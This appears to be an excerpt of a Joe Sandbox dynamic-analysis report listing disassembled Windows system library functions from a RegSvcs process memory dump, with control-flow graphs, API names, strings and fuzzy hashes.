                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3b1c48adf025244af7bc636abfddebca4b121fac4d8d8fad738348bce1348cb5
                                                        • Instruction ID: e8523e5f539f76d97e6074d5a3e98f1b02a3e4efa5dbe39e5cf5af5196f756f2
                                                        • Opcode Fuzzy Hash: 3b1c48adf025244af7bc636abfddebca4b121fac4d8d8fad738348bce1348cb5
                                                        • Instruction Fuzzy Hash: B290023120140453D25571598604707000997D0241F95C412B4525558DD7568A52A621
                                                        Function 01142C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 1142c70-1142c7c LdrInitializeThunk
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(010FFB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01157BE5,00001000,00004000,000000FF,?,00000000), ref: 01142C7A
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4acbf673a99cf0cb73d2cb224781aab4a0c1cde6cc9a44e086f3f592bdc2dd3e
                                                        • Instruction ID: 3bc3e2892cb4fc14f3fb96c7f22e7f9f92baf7275aae44581ea1ff5ad72ae39a
                                                        • Opcode Fuzzy Hash: 4acbf673a99cf0cb73d2cb224781aab4a0c1cde6cc9a44e086f3f592bdc2dd3e
                                                        • Instruction Fuzzy Hash: E490023120148842D2547159C50474A000597D0301F59C411B8525658DC79589917621
                                                        Function 011435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 7 11435c0-11435cc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: cbfdf6cad0dca05251499e114acad9e979c719ef36b0f4eda97f0819788579aa
                                                        • Instruction ID: 3ca4f1105e5f8c84f35f36511cc64975d0b04f166e50e3c8b1360365d02ffd98
                                                        • Opcode Fuzzy Hash: cbfdf6cad0dca05251499e114acad9e979c719ef36b0f4eda97f0819788579aa
                                                        • Instruction Fuzzy Hash: FF90023160550442D24471598614706100597D0201F65C411B4525568DC7958A516AA2

                                                        Non-executed Functions

                                                        Function 01144A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 8 1144a80-1144a8b 9 1144a8d-1144a99 RtlDebugPrintTimes 8->9 10 1144a9f-1144aa6 8->10 9->10 15 1144b25-1144b26 9->15 11 1144aaf-1144ab6 call 112f5a0 10->11 12 1144aa8-1144aae 10->12 17 1144b23 11->17 18 1144ab8-1144b22 call 1131e46 * 2 11->18 17->15 18->17
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0ITw$0ITw$0ITw$0ITw$0ITw$0ITw
                                                        • API String ID: 3446177414-3283678409
                                                        • Opcode ID: 1231409672633bad49d99cf2f40b17d77fc89a88f9bf3400a69ebf489560df92
                                                        • Instruction ID: a901aed293fe2a659cac93e5bd6c7e83ad9e6a0b9f716e08aaf47a5c2e3e58eb
                                                        • Opcode Fuzzy Hash: 1231409672633bad49d99cf2f40b17d77fc89a88f9bf3400a69ebf489560df92
                                                        • Instruction Fuzzy Hash: C201B532E486585BD72CBA2879087862A95B7C9B3CF15407EFA18AF288D7604CC1DB94
                                                        Function 01142890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 219 1142890-11428b3 220 117a4bc-117a4c0 219->220 221 11428b9-11428cc 219->221 220->221 222 117a4c6-117a4ca 220->222 223 11428dd-11428df 221->223 224 11428ce-11428d7 221->224 222->221 226 117a4d0-117a4d4 222->226 225 11428e1-11428e5 223->225 224->223 227 117a57e-117a585 224->227 228 1142988-114298e 225->228 229 11428eb-11428fa 225->229 226->221 230 117a4da-117a4de 226->230 227->223 233 1142908-114290c 228->233 231 1142900-1142905 229->231 232 117a58a-117a58d 229->232 230->221 234 117a4e4-117a4eb 230->234 231->233 232->233 233->225 235 114290e-114291b 233->235 236 117a564-117a56c 234->236 237 117a4ed-117a4f4 234->237 238 117a592-117a599 235->238 239 1142921 235->239 236->221 240 117a572-117a576 236->240 241 117a4f6-117a4fe 237->241 242 117a50b 237->242 251 117a5a1-117a5c9 call 1150050 238->251 244 1142924-1142926 239->244 240->221 245 117a57c call 1150050 240->245 241->221 246 117a504-117a509 241->246 243 117a510-117a536 call 1150050 242->243 259 117a55d-117a55f 243->259 248 1142993-1142995 244->248 249 1142928-114292a 244->249 245->259 246->243 248->249 254 1142997-11429b1 call 1150050 248->254 256 1142946-1142966 call 1150050 249->256 257 114292c-114292e 249->257 268 1142969-1142974 254->268 256->268 257->256 262 1142930-1142944 call 1150050 257->262 265 1142981-1142985 259->265 262->256 268->244 270 1142976-1142979 268->270 270->251 271 114297f 270->271 271->265
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID:
                                                        • API String ID: 48624451-0
                                                        • Opcode ID: 99bc65fdfc22ca79064101d4aed4d68c25249ad50e6686c22a62a148fbe51be2
                                                        • Instruction ID: c4091470a68c1f0be83a02b88911ea8224b695ea767a7f823b6cc0dc5904f190
                                                        • Opcode Fuzzy Hash: 99bc65fdfc22ca79064101d4aed4d68c25249ad50e6686c22a62a148fbe51be2
                                                        • Instruction Fuzzy Hash: 1451D7B5A00217BFDB29DB9CD89097EFBB8BF086407148229F5A5D7641E374DE408BA0
                                                        Function 0111A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 272 111a250-111a26f 273 111a275-111a291 272->273 274 111a58d-111a594 272->274 275 11679e6-11679eb 273->275 276 111a297-111a2a0 273->276 274->273 277 111a59a-11679bb 274->277 276->275 278 111a2a6-111a2ac 276->278 277->273 282 11679c1-11679c6 277->282 280 111a2b2-111a2b4 278->280 281 111a6ba-111a6bc 278->281 280->275 284 111a2ba-111a2bd 280->284 283 111a6c2 281->283 281->284 285 111a473-111a479 282->285 286 111a2c3-111a2c6 283->286 284->275 284->286 287 111a2c8-111a2d1 286->287 288 111a2da-111a2dd 286->288 289 111a2d7 287->289 290 11679cb-11679d5 287->290 291 111a2e3-111a32b 288->291 292 111a6c7-111a6d0 288->292 289->288 294 11679da-11679e3 call 118f290 290->294 295 111a330-111a335 291->295 292->291 293 111a6d6-11679ff 292->293 293->294 294->275 298 111a33b-111a343 295->298 299 111a47c-111a47f 295->299 301 111a34f-111a35d 298->301 303 111a345-111a349 298->303 300 111a485-111a488 299->300 299->301 304 1167a16-1167a19 300->304 305 111a48e-111a49e 300->305 301->305 307 111a363-111a368 301->307 303->301 306 111a59f-111a5a8 303->306 308 1167a1f-1167a24 304->308 309 111a36c-111a36e 304->309 305->304 310 111a4a4-111a4ad 305->310 311 111a5c0-111a5c3 306->311 312 111a5aa-111a5ac 306->312 307->309 315 1167a2b 308->315 313 1167a26 309->313 314 111a374-111a38c call 111a6e0 309->314 310->309 317 1167a01 311->317 318 111a5c9-111a5cc 311->318 312->301 316 111a5b2-111a5bb 312->316 313->315 325 111a4b2-111a4b9 314->325 326 111a392-111a3ba 314->326 320 1167a2d-1167a2f 315->320 316->309 322 1167a0c 317->322 321 111a5d2-111a5d5 318->321 318->322 320->285 324 1167a35 320->324 321->312 322->304 327 111a3bc-111a3be 325->327 328 111a4bf-111a4c2 325->328 326->327 327->320 329 111a3c4-111a3cb 327->329 328->327 330 111a4c8-111a4d3 328->330 331 111a3d1-111a3d4 329->331 332 1167ae0 329->332 330->295 333 111a3e0-111a3ea 331->333 334 1167ae4-1167afc call 118f290 332->334 333->334 336 111a3f0-111a40c call 111a840 333->336 334->285 340 111a412-111a417 336->340 341 111a5d7-111a5e0 336->341 340->285 342 111a419-111a43d 340->342 343 111a601-111a603 341->343 344 111a5e2-111a5eb 341->344 345 111a440-111a443 342->345 347 111a605-111a623 call 1104508 343->347 348 111a629-111a631 343->348 344->343 346 111a5ed-111a5f1 344->346 349 111a449-111a44c 345->349 350 111a4d8-111a4dc 345->350 351 111a681-111a6ab RtlDebugPrintTimes 346->351 352 111a5f7-111a5fb 346->352 347->285 347->348 354 1167ad6 349->354 355 111a452-111a454 349->355 357 111a4e2-111a4e5 350->357 358 1167a3a-1167a42 350->358 351->343 366 111a6b1-111a6b5 351->366 352->343 352->351 354->332 360 111a520-111a539 call 111a6e0 355->360 361 111a45a-111a461 355->361 362 111a634-111a64a 357->362 364 111a4eb-111a4ee 357->364 358->362 363 1167a48-1167a4c 358->363 378 111a53f-111a567 360->378 379 111a65e-111a665 360->379 367 111a467-111a46c 361->367 368 111a57b-111a582 361->368 369 111a650-111a659 362->369 370 111a4f4-111a50c 362->370 363->362 371 1167a52-1167a5b 363->371 364->349 364->370 366->343 367->285 373 111a46e 367->373 368->333 374 111a588 368->374 369->355 370->349 377 111a512-111a51b 370->377 375 1167a85-1167a87 371->375 376 1167a5d-1167a60 371->376 373->285 374->332 375->362 380 1167a8d-1167a96 375->380 381 1167a62-1167a6c 376->381 382 1167a6e-1167a71 376->382 377->355 383 111a569-111a56b 378->383 379->383 384 111a66b-111a66e 379->384 380->355 385 1167a81 381->385 386 1167a73-1167a7c 382->386 387 1167a7e 382->387 383->367 388 111a571-111a573 383->388 384->383 389 111a674-111a67c 384->389 385->375 386->380 387->385 390 111a579 388->390 391 1167a9b-1167aa4 388->391 389->345 390->368 391->390 392 1167aaa-1167ab0 391->392 392->390 393 1167ab6-1167abe 392->393 393->390 394 1167ac4-1167acf 393->394 394->393 395 1167ad1 394->395 395->390
                                                        Strings
                                                        • SsHd, xrefs: 0111A3E4
                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 011679D0, 011679F5
                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011679D5
                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011679FA
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                        • API String ID: 0-929470617
                                                        • Opcode ID: f753e07add7be5a6bd2e015251e86eceea13e22c1af92278ae7d9530a22fa475
                                                        • Instruction ID: 8d1b1abba131bd8429c0c47bc766ab3b2362b55fe67c61f53a62b6bca02e0a30
                                                        • Opcode Fuzzy Hash: f753e07add7be5a6bd2e015251e86eceea13e22c1af92278ae7d9530a22fa475
                                                        • Instruction Fuzzy Hash: C8E104306093818FD72DCE28D484B6AFFE4AF84228F094A3DE955CB295E731D944CB42
                                                        Function 0111D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 396 111d770-111d7ab 397 111d7b1-111d7bb 396->397 398 111d9e7-111d9ee 396->398 400 111d7c1-111d7ca 397->400 401 1169357 397->401 398->397 399 111d9f4-116932c 398->399 399->397 407 1169332-1169337 399->407 400->401 403 111d7d0-111d7d3 400->403 404 1169361-1169370 401->404 405 111d7d9-111d7db 403->405 406 111d9da-111d9dc 403->406 410 116934b-1169354 call 118f290 404->410 405->401 408 111d7e1-111d7e4 405->408 406->408 409 111d9e2 406->409 411 111d927-111d938 call 1144c30 407->411 408->401 413 111d7ea-111d7ed 408->413 409->413 410->401 417 111d7f3-111d7f6 413->417 418 111d9f9-111da02 413->418 419 111da0d-111da16 417->419 420 111d7fc-111d848 call 111d660 417->420 418->417 421 111da08-1169346 418->421 419->420 424 111da1c 419->424 420->411 426 111d84e-111d852 420->426 421->410 424->404 426->411 427 111d858-111d85f 426->427 428 111d9d1-111d9d5 427->428 429 111d865-111d869 427->429 430 1169563-116957b call 118f290 428->430 431 111d870-111d87a 429->431 430->411 431->430 432 111d880-111d887 431->432 434 111d889-111d88d 432->434 435 111d8ed-111d90d 432->435 438 111d893-111d898 434->438 439 1169372 434->439 437 111d910-111d913 435->437 440 111d915-111d918 437->440 441 111d93b-111d940 437->441 442 1169379-116937b 438->442 443 111d89e-111d8a5 438->443 439->442 444 1169559-116955e 440->444 445 111d91e-111d920 440->445 446 11694d3-11694db 441->446 447 111d946-111d949 441->447 442->443 448 1169381-11693aa 442->448 449 111d8ab-111d8e3 call 1148250 443->449 450 11693ea-11693ed 443->450 444->411 452 111d971-111d98c call 111a6e0 445->452 453 111d922 445->453 454 111da21-111da2f 446->454 455 11694e1-11694e5 446->455 447->454 456 111d94f-111d952 447->456 448->435 457 11693b0-11693ca call 11582c0 448->457 472 111d8e5-111d8e7 449->472 451 11693f1-1169400 call 11582c0 450->451 474 1169417 451->474 475 1169402-1169410 451->475 479 111d992-111d9ba 452->479 480 1169528-116952d 452->480 453->411 461 111d954-111d964 454->461 463 111da35-111da3e 454->463 455->454 460 11694eb-11694f4 455->460 456->440 456->461 457->472 478 11693d0-11693e3 457->478 467 11694f6-11694f9 460->467 468 1169512-1169514 460->468 461->440 469 111d966-111d96f 461->469 463->445 476 1169503-1169506 467->476 477 11694fb-1169501 467->477 468->454 473 116951a-1169523 468->473 469->445 472->435 481 1169420-1169424 472->481 473->445 474->481 475->451 484 1169412 475->484 486 116950f 476->486 487 1169508-116950d 476->487 477->468 478->457 488 11693e5 478->488 482 111d9bc-111d9be 479->482 480->482 483 1169533-1169536 480->483 481->435 485 116942a-1169430 481->485 489 111d9c4-111d9cb 482->489 490 1169549-116954e 482->490 483->482 491 116953c-1169544 483->491 484->435 492 1169457-1169460 485->492 493 1169432-116944f 485->493 486->468 487->473 488->435 489->428 489->431 490->411 494 1169554 490->494 491->437 496 11694a7-11694a9 492->496 497 1169462-1169467 492->497 493->492 495 1169451-1169454 493->495 494->444 495->492 498 11694cc-11694ce 496->498 499 11694ab-11694c6 call 1104508 496->499 497->496 500 1169469-116946d 497->500 498->411 499->411 499->498 502 1169475-11694a1 RtlDebugPrintTimes 500->502 503 116946f-1169473 500->503 502->496 506 11694a3 502->506 503->496 503->502 506->496
                                                        APIs
                                                        Strings
                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 01169341, 01169366
                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01169346
                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0116936B
                                                        • GsHd, xrefs: 0111D874
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                        • API String ID: 3446177414-576511823
                                                        • Opcode ID: 7b99f28050b7d8146f45945b4c96229eccdcd3d2a9bdce6cc70eab8a979eee5f
                                                        • Instruction ID: 6cbcf112cb736291d995ec77b1da4d299fbf80b67a0b1ccff74597543df4d519
                                                        • Opcode Fuzzy Hash: 7b99f28050b7d8146f45945b4c96229eccdcd3d2a9bdce6cc70eab8a979eee5f
                                                        • Instruction Fuzzy Hash: 7EE1C4706083468FDB2CCF68D484B6AFBE5BF88318F044A3DE9958B285D771E954CB52
                                                        Function 0114B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 507 114b5ec-114b5fc 508 114b600-114b602 507->508 509 114b5fe 507->509 510 114b830-114b844 call 1144b87 508->510 511 114b608-114b60d 508->511 509->508 512 114b621-114b62e 511->512 513 114b60f-114b612 511->513 516 114b631-114b63d call 114b5e6 512->516 513->510 515 114b618-114b61b 513->515 515->510 515->512 520 114b63f-114b644 516->520 521 114b64a-114b653 516->521 520->520 524 114b646-114b648 520->524 522 114b655-114b658 521->522 523 114b65a-114b65d 521->523 525 114b65f-114b662 522->525 523->525 526 114b665-114b66d 523->526 524->516 525->526 527 114b690-114b693 526->527 528 114b66f-114b672 526->528 531 114b695-114b698 527->531 532 114b6ad-114b6d4 call 1146810 527->532 529 114b674 528->529 530 114b67c-114b680 528->530 534 114b676-114b67a 529->534 535 114b682-114b684 530->535 536 114b68a-114b68d 530->536 531->532 537 114b69a-114b69e 531->537 542 114b6d7-114b6e9 call 114b5e6 532->542 534->532 535->536 539 114b686-114b688 535->539 536->527 540 114b6a4-114b6aa 537->540 541 114b6a0-114b6a2 537->541 539->534 540->532 541->532 541->540 545 114b6f3-114b704 call 114b5e6 542->545 546 114b6eb-114b6f1 542->546 555 114b791-114b794 545->555 556 114b70a-114b713 545->556 547 114b71b-114b727 546->547 550 114b797 547->550 551 114b729-114b735 547->551 552 114b79a-114b79e 550->552 553 114b766-114b769 551->553 554 114b737 551->554 557 114b7a0-114b7a2 552->557 558 114b7ad-114b7b0 552->558 561 114b76c-114b786 call 1146580 553->561 559 114b73e-114b741 554->559 560 114b739-114b73c 554->560 555->550 562 114b715 556->562 563 114b718 556->563 564 114b7a4 557->564 565 114b7a7-114b7ab 557->565 568 114b7b2-114b7b5 558->568 569 114b7df-114b7ed call 118d8b0 558->569 566 114b757-114b762 559->566 567 114b743-114b746 559->567 560->553 560->559 585 114b789-114b78c 561->585 562->563 563->547 564->565 571 114b815-114b81a 565->571 566->552 575 114b764 566->575 567->566 572 114b748-114b74e 567->572 573 114b7b7-114b7ba 568->573 574 114b80f 568->574 586 114b7f7-114b7fa 569->586 587 114b7ef-114b7f5 569->587 583 114b81c 571->583 584 114b81e-114b821 571->584 572->561 579 114b750 572->579 581 114b7bc-114b7c1 573->581 582 114b7ce-114b7d3 573->582 580 114b812 574->580 575->585 579->566 588 114b752-114b755 579->588 580->571 581->569 589 114b7c3-114b7c6 581->589 582->574 592 114b7d5 582->592 583->584 590 114b823-114b827 584->590 591 114b829-114b82f 584->591 585->542 593 114b805-114b80d 586->593 594 114b7fc-114b803 586->594 587->571 588->561 588->566 589->580 595 114b7c8-114b7ca 589->595 590->591 592->569 596 114b7d7-114b7dd 592->596 593->571 594->571 595->569 597 114b7cc 595->597 596->569 596->580 597->580
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                        • Instruction ID: fe0ebba4acb43aaa116725e86e7d04ba91347b08e6552120f6dc7bc0496cecd2
                                                        • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                        • Instruction Fuzzy Hash: 0B818D70A0924A9FEF2DCF6CC8917FEBBA2AF45B20F184159D861A72D1C734D8418B59
                                                        Function 01109126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 598 1109126-11091db call 1157eb0 call 1149020 call 1119950 605 11091f1-11091f8 598->605 606 11091dd-11091ee 598->606 605->606 607 11091fa-1109201 605->607 607->606 608 1109203-110921f call 111a250 607->608 608->606 611 1109221-1109227 608->611 612 110922d-1109234 611->612 613 1162518-116251d 611->613 614 1162522-1162529 612->614 615 110923a 612->615 613->606 616 1109241-110929e call 1125b20 614->616 617 116252f-1162539 614->617 615->616 616->606 620 11092a4-11092ba call 11205a0 616->620 617->616 620->606 623 11092c0-116256b RtlDebugPrintTimes 620->623 623->606 626 1162571-116257a 623->626 627 1162580-1162595 call 111dd20 626->627 628 1162651-116265c 626->628 633 1162597-1162598 call 1113c70 627->633 634 116259d-11625cb call 1119950 627->634 630 11626a0-11626a7 628->630 631 116265e-1162669 RtlDebugPrintTimes ReleaseActCtx 628->631 630->606 631->630 633->634 638 1162645-116264c call 1162674 634->638 639 11625cd-11625ea call 111a250 634->639 638->628 639->638 643 11625ec-11625f2 639->643 644 11625f4-11625f9 643->644 645 11625fb-1162638 call 11205a0 643->645 646 116263f 644->646 645->638 649 116263a 645->649 646->638 649->646
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$@
                                                        • API String ID: 3446177414-1194432280
